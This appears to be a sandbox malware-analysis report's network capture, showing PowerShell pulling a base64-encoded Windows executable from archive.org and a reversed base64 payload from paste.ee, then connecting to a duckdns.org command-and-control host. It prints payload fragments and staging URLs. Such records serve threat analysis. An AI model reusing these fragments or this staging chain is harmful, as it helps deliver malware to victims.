                              Oct 2, 2024 05:31:27.569611073 CEST300049722192.169.69.26192.168.2.11
                              Oct 2, 2024 05:31:27.569669962 CEST300049722192.169.69.26192.168.2.11
                              Oct 2, 2024 05:31:27.569677114 CEST497223000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:31:28.389913082 CEST497233000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:31:28.521219969 CEST300049723192.169.69.26192.168.2.11
                              Oct 2, 2024 05:31:28.523082972 CEST497233000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:31:28.523262978 CEST497233000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:31:28.528033972 CEST300049723192.169.69.26192.168.2.11
                              Oct 2, 2024 05:31:38.284257889 CEST300049723192.169.69.26192.168.2.11
                              Oct 2, 2024 05:31:38.284353971 CEST497233000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:31:38.284471989 CEST497233000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:31:38.289243937 CEST300049723192.169.69.26192.168.2.11
                              Oct 2, 2024 05:31:39.295861959 CEST497243000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:31:39.300982952 CEST300049724192.169.69.26192.168.2.11
                              Oct 2, 2024 05:31:39.301141977 CEST497243000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:31:39.301505089 CEST497243000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:31:39.306344032 CEST300049724192.169.69.26192.168.2.11
                              Oct 2, 2024 05:31:49.157362938 CEST300049724192.169.69.26192.168.2.11
                              Oct 2, 2024 05:31:49.157586098 CEST497243000192.168.2.11192.169.69.26

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Oct 2, 2024 05:29:41.658802032 CEST6389153192.168.2.111.1.1.1
                              Oct 2, 2024 05:29:41.807509899 CEST53638911.1.1.1192.168.2.11
                              Oct 2, 2024 05:29:48.429210901 CEST5511753192.168.2.111.1.1.1
                              Oct 2, 2024 05:29:48.436530113 CEST53551171.1.1.1192.168.2.11
                              Oct 2, 2024 05:29:50.296443939 CEST5928753192.168.2.111.1.1.1
                              Oct 2, 2024 05:29:50.401395082 CEST53592871.1.1.1192.168.2.11
                              Oct 2, 2024 05:30:55.468090057 CEST5581553192.168.2.111.1.1.1
                              Oct 2, 2024 05:30:55.879667997 CEST53558151.1.1.1192.168.2.11

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Oct 2, 2024 05:29:41.658802032 CEST192.168.2.111.1.1.10xc9cbStandard query (0)ia600100.us.archive.orgA (IP address)IN (0x0001)false
                              Oct 2, 2024 05:29:48.429210901 CEST192.168.2.111.1.1.10xf9a9Standard query (0)paste.eeA (IP address)IN (0x0001)false
                              Oct 2, 2024 05:29:50.296443939 CEST192.168.2.111.1.1.10xb041Standard query (0)23spt.duckdns.orgA (IP address)IN (0x0001)false
                              Oct 2, 2024 05:30:55.468090057 CEST192.168.2.111.1.1.10x40e1Standard query (0)23spt.duckdns.orgA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Oct 2, 2024 05:29:41.807509899 CEST1.1.1.1192.168.2.110xc9cbNo error (0)ia600100.us.archive.org207.241.227.240A (IP address)IN (0x0001)false
                              Oct 2, 2024 05:29:48.436530113 CEST1.1.1.1192.168.2.110xf9a9No error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                              Oct 2, 2024 05:29:48.436530113 CEST1.1.1.1192.168.2.110xf9a9No error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                              Oct 2, 2024 05:29:50.401395082 CEST1.1.1.1192.168.2.110xb041No error (0)23spt.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                              Oct 2, 2024 05:30:55.879667997 CEST1.1.1.1192.168.2.110x40e1No error (0)23spt.duckdns.org192.169.69.26A (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • ia600100.us.archive.org
                              • paste.ee

                              HTTPS Proxied Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.1149705207.241.227.2404437540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              TimestampBytes transferredDirectionData
                              2024-10-02 03:29:42 UTC109OUTGET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1
                              Host: ia600100.us.archive.org
                              Connection: Keep-Alive
                              2024-10-02 03:29:42 UTC606INHTTP/1.1 200 OK
                              Server: nginx/1.24.0 (Ubuntu)
                              Date: Wed, 02 Oct 2024 03:29:42 GMT
                              Content-Type: text/plain; charset=utf-8
                              Content-Length: 2823512
                              Last-Modified: Wed, 11 Sep 2024 23:50:18 GMT
                              Connection: close
                              ETag: "66e22cba-2b1558"
                              Strict-Transport-Security: max-age=15724800
                              Expires: Wed, 02 Oct 2024 09:29:42 GMT
                              Cache-Control: max-age=21600
                              Access-Control-Allow-Origin: *
                              Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                              Access-Control-Allow-Credentials: true
                              Accept-Ranges: bytes
                              2024-10-02 03:29:42 UTC15778INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 42 6f 43 42 62 6f 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 45 59 67 41 41 41 49 41 41 41 41 41 41 41 41 76 6d 55 67 41 41 41 67 41 41 41 41 67 43 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                              Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABoCBboAAAAAAAAAAOAADiELATAAAEYgAAAIAAAAAAAAvmUgAAAgAAAAgCAAAABAAAAgAAAAAgA
                              2024-10-02 03:29:42 UTC16384INData Raw: 41 41 41 50 34 4d 45 77 42 46 41 67 41 41 41 41 55 41 41 41 41 31 41 41 41 41 4f 41 41 41 41 41 41 41 45 51 4d 52 46 78 45 49 63 35 73 46 41 41 5a 76 63 51 41 41 43 69 41 42 41 41 41 41 66 73 55 49 41 41 52 37 42 51 6b 41 42 44 6e 4a 2f 2f 2f 2f 4a 69 41 41 41 41 41 41 4f 4c 37 2f 2f 2f 38 41 41 4e 30 66 41 41 41 41 49 41 49 41 41 41 42 2b 78 51 67 41 42 48 73 53 43 51 41 45 4f 73 6e 36 2f 2f 38 6d 49 41 41 41 41 41 41 34 76 76 72 2f 2f 78 45 44 62 79 73 41 41 41 6f 57 50 6f 38 41 41 41 41 67 41 51 41 41 41 48 37 46 43 41 41 45 65 77 73 4a 41 41 51 36 6e 66 72 2f 2f 79 59 67 41 51 41 41 41 44 69 53 2b 76 2f 2f 45 67 63 6f 63 41 41 41 43 68 4d 49 49 41 55 41 41 41 42 2b 78 51 67 41 42 48 76 30 43 41 41 45 4f 6e 58 36 2f 2f 38 6d 49 41 59 41 41 41 41 34 61
                              Data Ascii: AAAP4MEwBFAgAAAAUAAAA1AAAAOAAAAAAAEQMRFxEIc5sFAAZvcQAACiABAAAAfsUIAAR7BQkABDnJ////JiAAAAAAOL7///8AAN0fAAAAIAIAAAB+xQgABHsSCQAEOsn6//8mIAAAAAA4vvr//xEDbysAAAoWPo8AAAAgAQAAAH7FCAAEewsJAAQ6nfr//yYgAQAAADiS+v//EgcocAAAChMIIAUAAAB+xQgABHv0CAAEOnX6//8mIAYAAAA4a
                              2024-10-02 03:29:42 UTC16384INData Raw: 2f 2f 2f 77 41 52 42 47 39 49 49 77 41 47 62 33 51 41 41 41 6f 54 42 53 41 46 41 41 41 41 4f 44 48 2f 2f 2f 38 41 4f 4e 73 41 41 41 41 67 43 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 4d 41 45 55 67 41 41 41 41 4f 51 49 41 41 47 34 43 41 41 42 61 41 51 41 41 66 51 41 41 41 4d 73 43 41 41 43 4d 41 51 41 41 46 41 45 41 41 4a 77 44 41 41 43 55 41 41 41 41 41 51 4d 41 41 4c 77 41 41 41 41 57 41 41 41 41 33 41 49 41 41 4d 63 42 41 41 43 6a 41 51 41 41 53 67 49 41 41 41 55 41 41 41 43 62 41 67 41 41 58 67 41 41 41 49 45 42 41 41 41 38 41 51 41 41 61 77 45 41 41 42 30 44 41 41 44 38 41 41 41 41 66 77 49 41 41 4f 30 42 41 41 44 68 41 41 41 41 53 77 45 41 41 44 51 41 41 41 42 46 41 41 41 41 49 51 41 41 41 42 4d 43 41 41 41 34 4e 41 49 41 41 42 45 49 4f 6a 30 44 41
                              Data Ascii: ///wARBG9IIwAGb3QAAAoTBSAFAAAAODH///8AONsAAAAgCAAAADgEAAAA/gwMAEUgAAAAOQIAAG4CAABaAQAAfQAAAMsCAACMAQAAFAEAAJwDAACUAAAAAQMAALwAAAAWAAAA3AIAAMcBAACjAQAASgIAAAUAAACbAgAAXgAAAIEBAAA8AQAAawEAAB0DAAD8AAAAfwIAAO0BAADhAAAASwEAADQAAABFAAAAIQAAABMCAAA4NAIAABEIOj0DA
                              2024-10-02 03:29:42 UTC16384INData Raw: 38 52 43 53 68 31 41 67 41 47 62 7a 49 6a 41 41 59 52 43 57 2f 47 49 67 41 47 4b 48 59 43 41 41 5a 76 4d 69 4d 41 42 69 68 30 41 67 41 47 45 77 38 67 43 51 41 41 41 48 37 46 43 41 41 45 65 38 49 49 41 41 51 36 7a 50 37 2f 2f 79 59 67 44 51 41 41 41 44 6a 42 2f 76 2f 2f 45 51 49 54 41 79 41 49 41 41 41 41 2f 67 34 4b 41 44 69 72 2f 76 2f 2f 4f 42 73 42 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 37 4d 49 41 41 51 36 6c 76 37 2f 2f 79 59 67 41 41 41 41 41 44 69 4c 2f 76 2f 2f 45 51 45 67 70 30 47 63 33 79 41 44 41 41 41 41 59 79 42 63 44 35 4f 49 59 58 37 46 43 41 41 45 65 38 51 49 41 41 52 68 4b 46 51 43 41 41 59 6f 59 77 49 41 42 68 4d 43 49 42 34 41 41 41 41 34 56 2f 37 2f 2f 78 45 48 4f 6c 6f 42 41 41 41 67 43 67 41 41 41 48 37 46 43 41 41 45 65
                              Data Ascii: 8RCSh1AgAGbzIjAAYRCW/GIgAGKHYCAAZvMiMABih0AgAGEw8gCQAAAH7FCAAEe8IIAAQ6zP7//yYgDQAAADjB/v//EQITAyAIAAAA/g4KADir/v//OBsBAAAgAAAAAH7FCAAEe7MIAAQ6lv7//yYgAAAAADiL/v//EQEgp0Gc3yADAAAAYyBcD5OIYX7FCAAEe8QIAARhKFQCAAYoYwIABhMCIB4AAAA4V/7//xEHOloBAAAgCgAAAH7FCAAEe
                              2024-10-02 03:29:42 UTC16384INData Raw: 41 41 4f 4d 37 38 2f 2f 38 52 41 54 6b 71 2f 66 2f 2f 49 41 63 41 41 41 42 2b 78 51 67 41 42 48 76 6b 43 41 41 45 4f 72 50 38 2f 2f 38 6d 49 41 49 41 41 41 41 34 71 50 7a 2f 2f 77 41 41 41 52 41 41 41 41 49 41 71 77 44 35 70 41 46 33 41 41 41 41 41 43 5a 2b 6f 51 41 41 42 42 54 2b 41 53 6f 41 41 42 70 2b 6f 51 41 41 42 43 6f 41 4b 76 34 4a 41 41 42 76 5a 51 41 41 43 69 6f 41 4b 76 34 4a 41 41 42 76 54 51 41 41 43 69 6f 41 4c 67 44 2b 43 51 41 41 4b 50 77 6c 41 41 59 71 4c 67 44 2b 43 51 41 41 4b 4c 45 45 41 41 59 71 4b 76 34 4a 41 41 42 76 2b 51 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 2b 41 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 45 43 4d 41 42 69 6f 41 4c 67 44 2b 43 51 41 41 4b 43 55 42 41 41 6f 71 48 67 41 6f 73 41 51 41 42 69 70 4b 2f 67 6b 41 41
                              Data Ascii: AAOM78//8RATkq/f//IAcAAAB+xQgABHvkCAAEOrP8//8mIAIAAAA4qPz//wAAARAAAAIAqwD5pAF3AAAAACZ+oQAABBT+ASoAABp+oQAABCoAKv4JAABvZQAACioAKv4JAABvTQAACioALgD+CQAAKPwlAAYqLgD+CQAAKLEEAAYqKv4JAABv+QIABioAKv4JAABv+AIABioAKv4JAABvECMABioALgD+CQAAKCUBAAoqHgAosAQABipK/gkAA
                              2024-10-02 03:29:42 UTC16384INData Raw: 6f 49 41 41 51 36 59 50 2f 2f 2f 79 59 67 43 41 41 41 41 44 68 56 2f 2f 2f 2f 4f 47 30 41 41 41 41 67 42 77 41 41 41 48 37 46 43 41 41 45 65 37 67 49 41 41 51 36 50 50 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 78 2f 2f 2f 2f 41 41 49 6f 43 77 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 75 67 67 41 42 44 6b 57 2f 2f 2f 2f 4a 69 41 42 41 41 41 41 4f 41 76 2f 2f 2f 38 41 49 49 66 62 73 78 73 67 6d 4f 66 75 4f 6c 67 67 64 4f 74 35 55 57 46 2b 78 51 67 41 42 48 73 43 43 51 41 45 59 53 67 37 41 77 41 47 4b 44 77 44 41 41 5a 36 42 47 39 67 41 41 41 4b 46 79 68 76 41 77 41 47 45 77 49 67 42 67 41 41 41 48 37 46 43 41 41 45 65 37 30 49 41 41 51 36 77 66 37 2f 2f 79 59 67 43 51 41 41 41 44 69 32 2f 76 2f 2f 41 41 51 55 2f 67 45 54 41 53 41 44 41 41 41 41 4f
                              Data Ascii: oIAAQ6YP///yYgCAAAADhV////OG0AAAAgBwAAAH7FCAAEe7gIAAQ6PP///yYgBAAAADgx////AAIoCwMABiACAAAAfsUIAAR7uggABDkW////JiABAAAAOAv///8AIIfbsxsgmOfuOlggdOt5UWF+xQgABHsCCQAEYSg7AwAGKDwDAAZ6BG9gAAAKFyhvAwAGEwIgBgAAAH7FCAAEe70IAAQ6wf7//yYgCQAAADi2/v//AAQU/gETASADAAAAO
                              2024-10-02 03:29:42 UTC16384INData Raw: 41 41 4f 4b 37 2f 2f 2f 38 52 41 44 70 2f 41 41 41 41 49 41 51 41 41 41 41 34 6e 66 2f 2f 2f 78 45 43 4f 71 49 41 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 38 4d 49 41 41 51 36 67 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 68 33 2f 2f 2f 2f 41 41 49 6f 70 41 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 76 67 67 41 42 44 70 63 2f 2f 2f 2f 4a 69 41 44 41 41 41 41 4f 46 48 2f 2f 2f 38 41 4b 67 41 44 46 43 69 79 41 77 41 47 45 77 41 67 42 51 41 41 41 44 67 37 2f 2f 2f 2f 4f 44 41 41 41 41 41 67 43 41 41 41 41 50 34 4f 41 51 41 34 4a 50 2f 2f 2f 77 41 67 4a 47 76 43 36 53 41 58 47 50 4f 77 59 58 37 46 43 41 41 45 65 38 41 49 41 41 52 68 4b 4b 30 44 41 41 59 6f 73 51 51 41 42 6e 6f 43 65 37 4d 41 41 41 51 54 41 69 41 48 41 41 41 41 4f 50 54 2b 2f
                              Data Ascii: AAOK7///8RADp/AAAAIAQAAAA4nf///xECOqIAAAAgAAAAAH7FCAAEe8MIAAQ6gv///yYgAAAAADh3////AAIopAMABiACAAAAfsUIAAR7vggABDpc////JiADAAAAOFH///8AKgADFCiyAwAGEwAgBQAAADg7////ODAAAAAgCAAAAP4OAQA4JP///wAgJGvC6SAXGPOwYX7FCAAEe8AIAARhKK0DAAYosQQABnoCe7MAAAQTAiAHAAAAOPT+/
                              2024-10-02 03:29:42 UTC16384INData Raw: 4d 41 41 41 45 6f 38 67 4d 41 42 69 6a 7a 41 77 41 47 45 78 51 67 42 51 41 41 41 48 37 46 43 41 41 45 65 78 49 4a 41 41 51 36 42 65 66 2f 2f 79 59 67 41 51 41 41 41 44 6a 36 35 76 2f 2f 41 41 4b 6c 6c 51 41 41 41 58 4f 4d 41 51 41 4b 6a 4a 63 41 41 41 45 54 41 79 41 67 41 41 41 41 4f 4e 33 6d 2f 2f 38 41 45 51 48 51 43 67 41 41 41 53 6a 79 41 77 41 47 4b 50 4d 44 41 41 59 54 48 79 41 4b 41 41 41 41 4f 4c 2f 6d 2f 2f 38 34 73 4f 2f 2f 2f 79 41 4c 41 41 41 41 66 73 55 49 41 41 52 37 33 77 67 41 42 44 71 6d 35 76 2f 2f 4a 69 42 4a 41 41 41 41 4f 4a 76 6d 2f 2f 38 34 32 50 72 2f 2f 79 42 32 41 41 41 41 4f 49 7a 6d 2f 2f 38 41 41 6d 38 6c 41 41 41 4b 4b 4b 49 41 41 41 6f 6f 41 41 51 41 42 6f 79 57 41 41 41 42 45 77 4d 67 44 77 41 41 41 50 34 4f 4c 67 41 34 59
                              Data Ascii: MAAAEo8gMABijzAwAGExQgBQAAAH7FCAAEexIJAAQ6Bef//yYgAQAAADj65v//AAKllQAAAXOMAQAKjJcAAAETAyAgAAAAON3m//8AEQHQCgAAASjyAwAGKPMDAAYTHyAKAAAAOL/m//84sO///yALAAAAfsUIAAR73wgABDqm5v//JiBJAAAAOJvm//842Pr//yB2AAAAOIzm//8AAm8lAAAKKKIAAAooAAQABoyWAAABEwMgDwAAAP4OLgA4Y
                              2024-10-02 03:29:42 UTC16384INData Raw: 45 41 41 41 42 2b 78 51 67 41 42 48 76 71 43 41 41 45 4f 53 37 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 49 2f 2f 2f 2f 77 41 54 4d 41 51 41 52 67 41 41 41 4d 73 41 41 42 45 41 41 67 4d 45 4b 50 30 42 41 41 6f 41 41 6e 76 38 41 51 41 4b 4f 68 67 41 41 41 41 44 46 6a 38 52 41 41 41 41 41 77 49 6f 2f 67 45 41 43 76 34 43 46 76 34 42 4f 41 45 41 41 41 41 57 43 67 59 35 45 41 41 41 41 41 41 43 65 2f 51 42 41 41 6f 44 42 47 2f 65 41 51 41 4b 41 41 41 71 41 41 41 54 4d 41 51 41 6c 51 45 41 41 41 51 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 43 77 41 41 41 4b 77 41 41 41 43 48 41 41 41 41 30 77 41 41 41 4f 49 41 41 41 42 55 41 41 41 41 4b 51 41 41 41 41 55 41 41 41 42 45 41 41 41 41 47 67 45 41 41 50 51 41 41 41 43 71 41
                              Data Ascii: EAAAB+xQgABHvqCAAEOS7///8mIAEAAAA4I////wATMAQARgAAAMsAABEAAgMEKP0BAAoAAnv8AQAKOhgAAAADFj8RAAAAAwIo/gEACv4CFv4BOAEAAAAWCgY5EAAAAAACe/QBAAoDBG/eAQAKAAAqAAATMAQAlQEAAAQAABEgAwAAAP4OAAA4AAAAAP4MAABFCwAAAKwAAACHAAAA0wAAAOIAAABUAAAAKQAAAAUAAABEAAAAGgEAAPQAAACqA
                              2024-10-02 03:29:43 UTC16384INData Raw: 41 44 41 6e 74 45 41 67 41 4b 2f 67 51 4c 42 7a 6b 67 41 41 41 41 41 41 4a 37 52 51 49 41 43 67 4d 43 65 30 55 43 41 41 6f 44 46 31 67 43 65 30 51 43 41 41 6f 44 57 53 6a 51 41 51 41 4b 41 41 41 43 65 30 55 43 41 41 6f 44 42 4b 51 31 41 41 41 62 41 67 4a 37 52 41 49 41 43 68 64 59 66 55 51 43 41 41 6f 71 41 41 41 54 4d 41 4d 41 54 77 41 41 41 41 4d 42 41 42 45 41 41 6e 74 45 41 67 41 4b 43 6a 67 75 41 41 41 41 41 41 59 58 57 51 6f 43 65 30 55 43 41 41 6f 47 6f 7a 55 41 41 42 75 4d 4e 51 41 41 47 77 4f 4d 4e 51 41 41 47 2f 34 42 43 77 63 35 43 41 41 41 41 41 41 47 44 44 67 54 41 41 41 41 41 41 59 57 2f 67 49 4e 43 54 72 48 2f 2f 2f 2f 46 51 77 34 41 41 41 41 41 41 67 71 41 42 4d 77 41 77 41 74 41 41 41 41 62 41 41 41 45 51 41 43 41 79 6a 47 41 51 41 4b 43
                              Data Ascii: ADAntEAgAK/gQLBzkgAAAAAAJ7RQIACgMCe0UCAAoDF1gCe0QCAAoDWSjQAQAKAAACe0UCAAoDBKQ1AAAbAgJ7RAIAChdYfUQCAAoqAAATMAMATwAAAAMBABEAAntEAgAKCjguAAAAAAYXWQoCe0UCAAoGozUAABuMNQAAGwOMNQAAG/4BCwc5CAAAAAAGDDgTAAAAAAYW/gINCTrH////FQw4AAAAAAgqABMwAwAtAAAAbAAAEQACAyjGAQAKC


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.1149706188.114.96.34437540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              TimestampBytes transferredDirectionData
                              2024-10-02 03:29:48 UTC67OUTGET /d/nJcWp/0 HTTP/1.1
                              Host: paste.ee
                              Connection: Keep-Alive
                              2024-10-02 03:29:49 UTC1202INHTTP/1.1 200 OK
                              Date: Wed, 02 Oct 2024 03:29:49 GMT
                              Content-Type: text/plain; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Cache-Control: max-age=2592000
                              strict-transport-security: max-age=63072000
                              x-frame-options: DENY
                              x-content-type-options: nosniff
                              x-xss-protection: 1; mode=block
                              content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qWGwbONuHnPp2O0zpHrpfcgwFhehl5ApDwastyasDI%2FdwcrFwdmbStIb8qohrGd8Cp9ys0AFyFrcnEMJ5DrQk7UEv3wEFEa4zCNnWIfhcQV0sV2tYS%2BbnCYWzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8cc19c391d63c336-EWR
                              2024-10-02 03:29:49 UTC167INData Raw: 31 66 37 66 0d 0a 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a
                              Data Ascii: 1f7f==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNz
                              2024-10-02 03:29:49 UTC1369INData Raw: 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42 41 2b 51 72 50 67 36 44 6d 2b 51 6f 50 38 35 44 64 2b 77 6d 50 6f 35 44 59 2b 77 6b 50 45 35 44 4d 2b 67 69 50 67 34 44 47 2b 51 68 50 51 34 44 44 2b 67 67 50 41 30 44 2f 39 51 66 50 67 33 44 32 39 51 63 50 38 32 44 74 39 77 61 50 49 32 44 67 39 67 58 50 30 31 44 57 39 67 54 50 30 30 44 47 38 67 50 50 59 7a 44 75 38 67 4a 50 34 78 44 57 38 67 44 50 59 73 44 2b 37 67 39 4f 34 75 44 6d 37 67 33 4f 59 74 44 4f 37 67 68 4f 34 72 44 32 36 67 72 4f 59 71 44 65
                              Data Ascii: AjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBAAAwIAHABA+QrPg6Dm+QoP85Dd+wmPo5DY+wkPE5DM+giPg4DG+QhPQ4DD+ggPA0D/9QfPg3D29QcP82Dt9waPI2Dg9gXP01DW9gTP00DG8gPPYzDu8gJP4xDW8gDPYsD+7g9O4uDm7g3OYtDO7ghO4rD26grOYqDe
                              2024-10-02 03:29:49 UTC1369INData Raw: 35 4d 51 4f 44 69 7a 41 34 4d 34 4e 44 63 7a 67 32 4d 67 4e 44 57 7a 41 31 4d 49 4e 44 51 7a 67 7a 4d 77 4d 44 4b 7a 41 79 4d 59 4d 44 45 7a 67 77 4d 41 49 44 2b 79 41 76 4d 6f 4c 44 34 79 67 74 4d 51 4c 44 79 79 41 73 4d 34 4b 44 73 79 67 71 4d 67 4b 44 6d 79 41 70 4d 49 4b 44 67 79 67 6e 4d 77 4a 44 61 79 41 6d 4d 59 4a 44 55 79 67 6b 4d 41 4a 44 4f 79 41 6a 4d 6f 49 44 49 79 67 68 4d 51 49 44 43 79 41 51 4d 34 48 44 38 78 67 65 4d 67 48 44 32 78 41 64 4d 49 48 44 77 78 67 62 4d 77 47 44 71 78 41 61 4d 59 47 44 6b 78 67 59 4d 41 47 44 65 78 41 58 4d 6f 46 44 59 78 67 56 4d 51 46 44 53 78 41 55 4d 34 45 44 4d 78 67 53 4d 67 45 44 47 78 41 52 4d 49 45 44 41 77 67 50 4d 77 44 44 36 77 41 4f 4d 59 44 44 30 77 67 4d 4d 41 44 44 75 77 41 4c 4d 6f 43 44 6f 77
                              Data Ascii: 5MQODizA4M4NDczg2MgNDWzA1MINDQzgzMwMDKzAyMYMDEzgwMAID+yAvMoLD4ygtMQLDyyAsM4KDsygqMgKDmyApMIKDgygnMwJDayAmMYJDUygkMAJDOyAjMoIDIyghMQIDCyAQM4HD8xgeMgHD2xAdMIHDwxgbMwGDqxAaMYGDkxgYMAGDexAXMoFDYxgVMQFDSxAUM4EDMxgSMgEDGxARMIEDAwgPMwDD6wAOMYDD0wgMMADDuwALMoCDow
                              2024-10-02 03:29:49 UTC1369INData Raw: 4d 6b 49 44 47 79 77 67 4d 41 45 44 39 78 67 65 4d 63 48 44 30 78 51 63 4d 34 47 44 72 78 41 61 4d 55 47 44 69 78 77 58 4d 77 46 44 5a 78 67 56 4d 4d 46 44 51 78 51 54 4d 6f 45 44 48 78 41 52 4d 45 41 44 2b 77 77 4f 4d 67 44 44 31 77 67 4d 4d 38 43 44 73 77 51 4b 4d 59 43 44 6a 77 41 49 4d 30 42 44 61 77 77 46 4d 51 42 44 52 77 67 44 4d 73 41 44 49 77 51 42 4d 49 41 41 41 44 67 48 41 47 41 41 41 2f 77 2f 50 77 2f 44 35 2f 67 39 50 4d 2f 44 77 2f 51 37 50 6f 2b 44 6e 2f 41 35 50 45 2b 44 65 2f 77 32 50 67 39 44 56 2f 67 30 50 38 38 44 4d 31 51 63 4e 41 58 44 76 31 67 4c 4e 57 52 6a 55 30 34 45 4e 4b 42 41 41 41 77 44 41 46 41 50 41 41 41 41 50 4d 7a 44 79 38 51 4d 50 41 7a 44 76 38 67 4c 50 30 79 44 73 38 77 4b 50 6f 79 44 70 38 41 4b 50 63 79 44 6d 38 51
                              Data Ascii: MkIDGywgMAED9xgeMcHD0xQcM4GDrxAaMUGDixwXMwFDZxgVMMFDQxQTMoEDHxARMEAD+wwOMgDD1wgMM8CDswQKMYCDjwAIM0BDawwFMQBDRwgDMsADIwQBMIAAADgHAGAAA/w/Pw/D5/g9PM/Dw/Q7Po+Dn/A5PE+De/w2Pg9DV/g0P88DM1QcNAXDv1gLNWRjU04ENKBAAAwDAFAPAAAAPMzDy8QMPAzDv8gLP0yDs8wKPoyDp8AKPcyDm8Q
